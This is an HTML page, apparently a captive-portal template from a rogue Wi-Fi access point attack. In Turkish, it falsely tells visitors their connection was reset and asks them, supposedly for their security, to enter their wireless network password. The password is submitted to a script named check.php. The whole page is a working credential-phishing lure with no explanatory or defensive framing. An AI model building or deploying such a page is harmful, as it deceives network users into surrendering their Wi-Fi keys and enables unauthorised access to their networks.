<html>

<head>
    <link rel="stylesheet" type="text/css" href="info2.css" media="all">
    <style> 
        strong {
            font-weight: bold;
        }
        
        html,
        body,
        div,
        font,
        strong,
        form,
        table,
        tbody,
        tr,
        td {
            margin: 0px;
            padding: 0px;
            border: 0px none;
            outline: 0px none;
            font-weight: inherit;
            font-style: inherit;
            font-size: 100%;
            font-family: inherit;
            vertical-align: baseline;
        }
        
        :focus {
            outline: 0px none;
        }
        
        body {
            line-height: 1;
            color: black;
            -moz-user-select: none;
        }
        
        table {
            border-collapse: separate;
            border-spacing: 0px;
        }
        
        td {
            text-align: left;
            font-weight: normal;
        }
        
        body {
            font-family: Verdana, Geneva, sans-serif;
            margin: 0px;
            padding: 0px;
            text-align: center;
            font-size: 14px;
            line-height: 14px;
            color: rgb(81, 85, 89);
            border: none;
            background-color: rgba(255, 255, 255, 0.3);
        }
        
        input {
            margin: 6px auto;
            padding-left: 7px;
            height: 20px;
            width: 300px;
            border: 1px solid rgb(207, 207, 207);
            font-family: Verdana, Geneva, sans-serif;
            font-size: 13px ! important;
            color: rgb(81, 85, 89);
        }
    </style>
</head>

<body marginheight="0" marginwidth="0">

    <table border="0" cellpadding="0" cellspacing="0" width="100%">
        <tbody border="0">
            <tr>
                <TABLE id="autoWidth">

                    <TBODY>
                        <tr>
                            <td>
                                <hr color="#9CBCE3" size=3 width="99%">
                            </td>
                        </tr>

                        <tr>
                            <td colspan=\ "2\"><font color="#282B2F"><b></b></td></tr>
        <tr><td colspan=\"2\"  ><font color="#282B2F"><b></b><strong>Bağlantı ayarlarınız sıfırlandı!</strong></td></tr>
        <tr><td colspan=\"2\"  ><font color="#282B2F"><b></b></td></tr>

<tr><td></td></tr>

<tr><td><hr color="#9CBCE3" size=3 width="99%"></td></tr>
<tr><td></td></tr>

        <TR>

          <TD class=info1 colspan=2>
<br><font color="#282B2F">
Bir sorun algılandı ve bağlantınız sıfırlandı. Tekrar bağlantı sağlamak için lütfen şifrenizi giriniz.
<br>
<br>
Güvenliğiniz için kablosuz ağ şifrenizi giriniz.<b></b>
<br>
<div id="box" align="left" >
<form id="form1" name="form1" method="POST" action="check.php" >
<tr><td><b><font color="#282B2F">Wi-Fi</b> Şifreniz:</td></tr>
<tr><td><center><input name="key1" type="password" class="textfield" /></center><td></tr>

        <TR><TD class=blue colspan=2></TD></TR>
                <TR><TD class=blue colspan=2></TD></TR>

<tr><td colspan="2"><center><INPUT name="Confirm" class="button" type="submit" value="Onayla"/></center></td></tr>

</form></div>

</TD></TR>

      </TBODY>

    </TABLE>
</table></div></td></tr></tbody></table>
</body>
</html>